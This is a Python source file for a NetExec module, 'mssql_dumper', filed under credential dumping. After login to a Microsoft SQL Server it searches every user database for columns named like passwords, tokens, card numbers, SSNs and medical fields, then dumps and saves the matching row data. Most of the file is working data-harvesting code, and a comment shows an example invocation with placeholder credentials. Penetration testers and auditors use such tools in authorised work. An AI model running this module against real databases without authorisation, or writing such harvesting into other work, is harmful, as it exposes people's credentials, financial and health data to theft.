import json
import datetime
import os
from pathlib import Path
import re
from nxc.helpers.misc import CATEGORY
from nxc.paths import NXC_PATH


class NXCModule:
    """MSSQL Dumper v1 - Created by LTJAX"""
    name = "mssql_dumper"
    description = "Search for Sensitive Data across all databases"
    supported_protocols = ["mssql"]
    category = CATEGORY.CREDENTIAL_DUMPING

    def options(self, context, module_options):
        """
        SHOW_DATA    Display the actual row data values of the matched columns (default: True)
        REGEX        Semicolon-separated regex pattern(s) to search for in cell values
        LIKE_SEARCH  Comma-separated list of column names to look for, or a file with one column name per line
        USE_PRESET   Use a predefined set of common PII column-name keywords (default: True)
        SAVE         Save the output to a JSON file (default: True)
        """
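        # Example invocation (illustrative only; the target, credentials, and option values are placeholders):
        #   nxc mssql 10.0.0.5 -u sa -p 'Password123' -M mssql_dumper -o LIKE_SEARCH=iban,secret REGEX='\d{3}-\d{2}-\d{4}'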
        self.regex_patterns = []
        self.show_data = module_options.get("SHOW_DATA", "true").lower() in ["true", "1", "yes"]
        regex_input = module_options.get("REGEX", "")
        for pattern in regex_input.split(";"):
            pattern = pattern.strip()
            if pattern:
                try:
                    self.regex_patterns.append(re.compile(pattern))
                except re.error as e:
                    context.log.fail(f"[!] Invalid regex pattern '{pattern}': {e}")
        like_input = module_options.get("LIKE_SEARCH", "")
        if os.path.isfile(like_input):
            with open(like_input) as f:
                self.like_search = [line.strip().lower() for line in f if line.strip()]
        else:
            self.like_search = [s.strip().lower() for s in like_input.split(",") if s.strip()]
        self.use_preset = module_options.get("USE_PRESET", "true").lower() in ["true", "1", "yes"]
        self.save = module_options.get("SAVE", "true").lower() in ["true", "1", "yes"]

    def pii(self):
        """Common personally identifiable information (PII) keywords to search for in column names"""
        return ["access_token", "account_number", "address", "allergies", "alt_email", "annual_salary", "apartment",
                "api_key", "auth_code", "auth_token", "bank_account", "bank_code", "bank_id", "bank_name", "bic",
                "billing_address", "birth_date", "blood_type", "card_exp", "card_number", "cardholder_name", "cc_exp_month",
                "cc_exp_year", "cc_number", "ccv", "city", "compensation", "contract_number", "country", "credit_card_expiry",
                "credit_card_hash", "credit_card_number", "credit_card", "creditcard", "cvv", "cvv2", "date_of_birth",
                "debit_card", "diagnosis", "dl_number", "dob", "drivers_license", "ein", "email_address", "email",
                "emergency_contact", "employee_id", "employment_status", "expiration_date", "expiry_date", "fax", "first_name",
                "full_name", "gender", "health_id", "house_number", "iban", "income", "insurance_id", "insurance_number",
                "invoice_id", "invoice_total", "job_title", "last_name", "legal_entity", "legal_name", "location", "login_token",
                "maiden_name", "medical_record", "medication", "mfa_secret", "middle_name", "mobile", "national_id", "nickname",
                "nin", "old_password", "order_amount", "order_id", "order_total", "otp_secret", "passport_number", "passwd_hash",
                "passwd", "password_hash", "password_plaintext", "password_salt", "password", "patient_id", "payment_status",
                "payment_token", "paypal_email", "phone_number", "phone", "phonenumber", "pin_code", "pin", "position",
                "prescriptions", "recovery_key", "refresh_token", "region", "reset_token", "routing_number", "salary", "secret_key",
                "security_answer", "security_code", "security_pin", "security_question", "session_token", "session", "sessionid",
                "social_security_number", "ssn_hash", "ssn", "state", "street", "tax_id", "temp_password", "tin", "token",
                "treatment", "user_credential", "user_name", "user_pass", "user_password", "user_secret", "user_token", "username",
                "zip", "zipcode"]

    def on_login(self, context, connection):
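        # Walk every non-system database: flag tables whose column names match the keyword list,
        # optionally regex-scan every cell value, and collect the findings for the optional JSON export.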
        all_results = []
        databases = connection.conn.sql_query("SELECT name FROM master.dbo.sysdatabases")
        if connection.conn.lastError:
            context.log.fail(f"Failed to retrieve databases: {connection.conn.lastError}")
            return

        for db in databases:
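            # fall back to the unnamed ("") key in case the result row does not carry a "name" column label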
            db_name = db.get("name") or db.get("", "")
            if db_name.lower() in ("master", "model", "msdb", "tempdb"):
                continue  # skip system DBs

            context.log.display(f"Searching database: {db_name}")
            connection.conn.sql_query(f"USE [{db_name}]")

            # get all tables in this DB
            tables = connection.conn.sql_query("SELECT table_name FROM information_schema.tables WHERE table_type = 'BASE TABLE'")

            for table in tables:
                table_name = table.get("table_name", "")
                try:
                    columns = connection.conn.sql_query(f"SELECT column_name FROM information_schema.columns WHERE table_name = '{table_name}'")

                    # find matching columns
                    search_keys = []
                    if self.use_preset:
                        search_keys += self.pii()
                    if self.like_search:
                        search_keys += self.like_search
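                    # case-insensitive substring match, so e.g. "email" also hits columns like "work_email_address"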
                    matched = [col for col in columns if any(key in col["column_name"].lower() for key in search_keys)]
                    if matched:
                        column_str = ", ".join(f"[{c['column_name']}]" for c in matched)
                        context.log.success(f"Match in {db_name}.{table_name} => Columns: {column_str}")
                        data = connection.conn.sql_query(f"SELECT {column_str} FROM [{table_name}]")
                        for row in data:
                            decoded_data = {k: (v.decode("utf-8", "replace").strip() if isinstance(v, bytes) else str(v).strip()) for k, v in row.items()}
                            if self.show_data:
                                context.log.highlight(f"{db_name}.{table_name} => " + ", ".join(f"{k}: {v}" for k, v in decoded_data.items()))
                            all_results.append({
                                "type": "column_match",
                                "database": db_name,
                                "table": table_name,
                                "row": decoded_data
                            })

                except Exception as e:
                    context.log.fail(f"Failed to inspect table {table_name} in {db_name}: {e}")

                # If regex patterns are provided, scan all cell values in the table for matches
                if self.regex_patterns:
                    try:
                        full_data = connection.conn.sql_query(f"SELECT * FROM [{table_name}]")
                        for row in full_data:
                            matched_cells = {}
                            for col, val in row.items():
                                val_str = val.decode("utf-8", "replace").strip() if isinstance(val, bytes) else str(val).strip()

                                # Record this cell if it matches any of the regex patterns
                                for pattern in self.regex_patterns:
                                    if pattern.search(val_str):
                                        matched_cells[col] = val_str
                                        break

                            if matched_cells:
                                match_str = ", ".join(f"{k}: {v}" for k, v in matched_cells.items())
                                if self.show_data:
                                    context.log.highlight(f"{db_name}.{table_name} => Regex Match => {match_str}")
                                all_results.append({
                                    "type": "regex_match",
                                    "database": db_name,
                                    "table": table_name,
                                    "matched_cells": matched_cells
                                })
                    except Exception as e:
                        context.log.fail(f"Regex scan failed for {db_name}.{table_name}: {e}")

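        # Illustrative shape of the saved JSON (values below are hypothetical examples, not real output):
        # [
        #   {"type": "column_match", "database": "HR", "table": "Employees", "row": {"email": "j.doe@corp.local"}},
        #   {"type": "regex_match", "database": "HR", "table": "Payroll", "matched_cells": {"notes": "123-45-6789"}}
        # ]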
        if self.save and all_results:
            filename = f"{connection.hostname}_{connection.host}_{datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}.json"
            file_path = Path(f"{NXC_PATH}/modules/mssql-dumper/{filename}").resolve()
            os.makedirs(file_path.parent, exist_ok=True)
            with open(file_path, "w") as f:
                json.dump(all_results, f, indent=2)
            context.log.success(f"Data saved to {file_path}")